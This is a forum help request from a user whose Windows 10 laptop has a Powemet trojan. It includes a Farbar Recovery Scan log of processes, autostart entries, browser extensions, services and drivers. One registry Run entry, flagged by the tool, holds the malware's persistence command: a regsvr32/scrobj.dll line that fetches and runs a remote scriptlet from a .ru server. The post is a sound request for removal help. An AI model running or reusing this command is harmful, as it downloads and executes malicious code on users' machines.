
Behavior:Win32/Powemet.B!attk trojan


  • This topic is locked
9 replies to this topic

#1 AznanZ

AznanZ

  • Members
  • 5 posts

Posted 01 September 2017 - 08:10 AM

Hi

My laptop is running Windows 10 Pro and is infected by this Powemet virus from a friend's flash drive; she didn't even know there was a virus there. I've done a scan using SpyHunter 4 and the result is 0; it can't detect it. Please help! Every time I boot it up, it'll detect, quarantine, and remove it; boot again and it's all the same. I've done this Farbar recovery scan and here's the result. Please help!

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-08-2017 01
Ran by Aezia (administrator) on AEZIA (01-09-2017 19:48:33)
Running from C:\Users\Aezia Aznan\Downloads
Loaded Profiles: Aezia (Available Profiles: Aezia)
Platform: Windows 10 Pro Version 1703 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Arcai.com) C:\Program Files (x86)\netcut\services\aips.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Atheros Communications, Inc.) C:\Program Files (x86)\Jumpstart\jswpbapi.exe
(AnchorFree Inc.) C:\Program Files (x86)\Hotspot Shield\bin\cmw_srv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(CyberLink) C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
() C:\Program Files\Sades 7.1CH Gaming Headset\CPL\FaceLift_x64.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(© 2015 Microsoft Corporation) C:\Users\Aezia Aznan\AppData\Local\Microsoft\BingSvc\BingSvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Security Assist\isa.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-19] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8510680 2015-07-23] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1394392 2015-07-23] (Realtek Semiconductor)
HKLM\...\Run: [QuickSet] => C:\Program Files\Dell\QuickSet\QuickSet.exe [3877936 2015-06-12] (Dell Inc.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [322472 2015-06-23] (Intel Corporation)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [16286840 2016-08-30] (Logitech Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [558496 2014-02-28] (Adobe Systems Incorporated)
HKLM\...\Run: [Cm108BSound] => C:\Program Files\Sades 7.1CH Gaming Headset\CPL\FaceLift_x64.exe [2341376 2014-11-10] ()
HKLM\...\Run: [WavesSvc] => C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe [600496 2015-07-07] (Waves Audio Ltd.)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files\PowerISO\PWRISOVM.EXE [454792 2016-05-25] (Power Software Ltd)
HKLM-x32\...\Run: [jswtrayutil] => C:\Program Files (x86)\Jumpstart\jswtrayutil.exe [528384 2008-09-26] (Atheros Communications, Inc.)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [4015216 2017-06-23] (Tonec Inc.)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3071776 2017-08-25] (Valve Corporation)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8912088 2016-08-27] (Piriform Ltd)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [DriverAgent Plus] => C:\ProgramData\DriverAgentPlus\DriverAgentPlus.exe [6122488 2016-10-12] ()
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [BingSvc] => C:\Users\Aezia Aznan\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27716568 2017-05-04] (Skype Technologies S.A.)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.39slxu3bw.ru/deploy.xml scrobj.dll <==== ATTENTION
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [GoogleChromeAutoLaunch_47C3CADE9C76B60CAF4A436AF4AD6798] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1301848 2017-08-23] (Google Inc.)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\ssText3d.scr [228864 2017-03-19] (Microsoft Corporation)
Lsa: [Notification Packages] scecli C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter "C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MobileGo Service.lnk [2017-03-26]
ShortcutTarget: MobileGo Service.lnk -> C:\Program Files (x86)\Wondershare\MobileGo\MobileGoService.exe (Wondershare)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScpToolkit Tray Notifications.lnk [2017-07-11]
ShortcutTarget: ScpToolkit Tray Notifications.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpTrayApp.exe (Scarlet.Crush Productions)
GroupPolicyScripts: Restriction <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: 127.0.0.1 cap.cyberlink.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{35d19de6-cf13-434e-a94e-31b23d41171c}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{5edcc3f5-7431-424e-be6c-4c4416c03462}: [DhcpNameServer] 10.254.0.1
Tcpip\..\Interfaces\{a9a7afba-db52-47f6-9ea2-8d672d364d0e}: [DhcpNameServer] 192.168.1.254
 
Internet Explorer:
==================
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/id-id/?ocid=iehp
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2017-06-23] (Internet Download Manager, Tonec Inc.)
BHO: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll [2017-06-26] (Intel Security)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2016-05-27] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2016-05-17] (Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2017-06-23] (Internet Download Manager, Tonec Inc.)
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2017-06-26] (Intel Security)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2016-05-17] (Microsoft Corporation)
Toolbar: HKLM - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll [2017-06-26] (Intel Security)
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2017-06-26] (Intel Security)
Toolbar: HKU\S-1-5-21-3909864297-3729878400-1751894149-1001 -> True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll [2017-06-26] (Intel Security)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-05-20] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-05-20] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-05-20] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-05-20] (Microsoft Corporation)
 
FireFox:
========
FF ProfilePath: C:\Users\Aezia Aznan\AppData\Roaming\Mozilla\Firefox\Profiles\w4qqqkc1.default-1478014215741 [2017-09-01]
FF Homepage: Mozilla\Firefox\Profiles\w4qqqkc1.default-1478014215741 -> www.google.com
FF Extension: (True Key Add-On) - C:\Users\Aezia Aznan\AppData\Roaming\Mozilla\Firefox\Profiles\w4qqqkc1.default-1478014215741\Extensions\@true-key [2016-11-11]
FF Extension: (Adblock Plus) - C:\Users\Aezia Aznan\AppData\Roaming\Mozilla\Firefox\Profiles\w4qqqkc1.default-1478014215741\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-11-08]
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-01-26]
FF HKLM-x32\...\Firefox\Extensions: [youcam@cyberlink.com] - C:\Program Files (x86)\CyberLink\YouCam7\BrowserExtension\Firefox => not found
FF HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Aezia Aznan\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Aezia Aznan\AppData\Roaming\IDM\idmmzcc5 [2017-06-26] [not signed]
FF HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_162.dll [2016-10-03] ()
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_162.dll [2016-10-03] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-05-27] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin HKU\S-1-5-21-3909864297-3729878400-1751894149-1001: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [2017-02-15] ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-05-27] (Microsoft Corporation)
 
Chrome: 
=======
CHR HomePage: Default -> msn.com
CHR Profile: C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default [2017-09-01]
CHR Extension: (Google Slides) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-11-21]
CHR Extension: (Google Docs) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-11-21]
CHR Extension: (Google Drive) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-11-21]
CHR Extension: (YouTube) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-11-21]
CHR Extension: (Adblock Plus) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-07-22]
CHR Extension: (Tampermonkey) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-06-22]
CHR Extension: (Love is Love) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbakekmnaeckpbfbkaeadjhfciappjkj [2017-04-10]
CHR Extension: (Google Sheets) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-11-21]
CHR Extension: (MSN Homepage) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fkkcgfbgohboipdhliafmacjnhjbhmim [2017-05-26]
CHR Extension: (Google Docs Offline) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-11-22]
CHR Extension: (AdBlock) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-08-18]
CHR Extension: (Grammarly for Chrome) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2017-08-28]
CHR Extension: (IDM Integration Module) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2017-07-19]
CHR Extension: (Hotspot Shield VPN Free Proxy – Unblock Sites) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbejmccbhkncgokjcmghpfloaajcffj [2017-08-30]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-30]
CHR Extension: (Gmail) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-11-21]
CHR Extension: (Chrome Media Router) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-11]
CHR Profile: C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\System Profile [2017-08-31]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-06-23]
CHR HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fkkcgfbgohboipdhliafmacjnhjbhmim] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-06-23]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AIPS; C:\Program Files (x86)\netcut\services\AIPS.exe [262144 2011-07-28] (Arcai.com) [File not signed]
R2 AtherosSvc; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe [323152 2015-06-07] (Windows ® Win 7 DDK provider)
S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [5632 2017-08-31] (Microsoft Corporation)
S2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [97616 2017-01-11] (Dell)
S2 Ds3Service; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe [394944 2016-04-12] (Scarlet.Crush Productions)
R2 hshld; C:\Program Files (x86)\Hotspot Shield\bin\cmw_srv.exe [2664568 2016-11-23] (AnchorFree Inc.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [18856 2015-06-23] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [373760 2016-11-07] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel® Corporation)
R3 Intel® Security Assist; C:\Program Files (x86)\Intel\Intel® Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [File not signed]
S2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe [7680 2015-05-19] () [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [223008 2015-06-24] (Intel Corporation)
R2 jswpbapi; C:\Program Files (x86)\Jumpstart\jswpbapi.exe [265216 2008-09-26] (Atheros Communications, Inc.) [File not signed]
S3 jswpsapi; C:\Program Files (x86)\Jumpstart\jswpsapi.exe [954368 2008-09-26] (Atheros Communications, Inc.) [File not signed]
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193656 2016-08-30] (Logitech Inc.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-27] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-27] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-27] (NVIDIA Corporation)
S3 OpenVPNService; C:\Program Files (x86)\OpenVPN\bin\openvpnserv.exe [32384 2016-10-03] (The OpenVPN Project)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2157456 2017-06-11] (Electronic Arts)
S2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3127192 2017-06-11] (Electronic Arts)
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [66872 2017-05-25] ()
R2 PnkBstrB; C:\WINDOWS\SysWOW64\PnkBstrB.exe [103736 2017-05-25] ()
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [614664 2014-10-20] (CyberLink)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [298200 2015-07-23] (Realtek Semiconductor)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-19] (Microsoft Corporation)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [263264 2017-02-16] (Synaptics Incorporated)
S2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [1001920 2017-06-26] (McAfee, Inc.)
S2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [16928 2017-06-26] (McAfee, Inc.)
S3 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [87760 2017-06-26] (McAfee, Inc.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-19] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-07-11] (Microsoft Corporation)
S2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.3.2.220\WsAppService.exe [441344 2017-01-05] (Wondershare) [File not signed]
S3 WsDrvInst; C:\Program Files (x86)\Wondershare\MobileGo\DriverInstall.exe [116368 2016-05-26] (Wondershare)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AFTrafMgr1.1; C:\Program Files (x86)\Hotspot Shield\bin\TrafMgr_1_1_64.sys [54712 2016-11-09] (AnchorFree Inc.)
S3 clwvd7; C:\WINDOWS\system32\DRIVERS\clwvd7.sys [42968 2015-03-24] (CyberLink Corporation)
S3 CMUAC; C:\WINDOWS\system32\DRIVERS\CMUAC.sys [613888 2014-10-09] (C-MEDIA)
R3 DellRbtn; C:\WINDOWS\System32\drivers\DellRbtn.sys [19440 2015-05-08] (OSR Open Systems Resources, Inc.)
S3 esgiguard; E:\AntiVirus\SpyHunter.4.27.1.4835.KaranPC\SpyHunter\esgiguard.sys [16432 2017-07-13] (Enigma Software Group USA, LLC.)
R3 iaLPSS_GPIO; C:\WINDOWS\System32\drivers\iaLPSS_GPIO.sys [46856 2015-06-15] (Intel Corporation)
R3 iaLPSS_UART2; C:\WINDOWS\System32\drivers\iaLPSS_UART2.sys [155400 2015-06-15] (Intel Corporation)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2016-08-30] (Logitech Inc.)
R3 LGSHidFilt; C:\WINDOWS\system32\DRIVERS\LGSHidFilt.Sys [64280 2016-08-30] (Logitech Inc.)
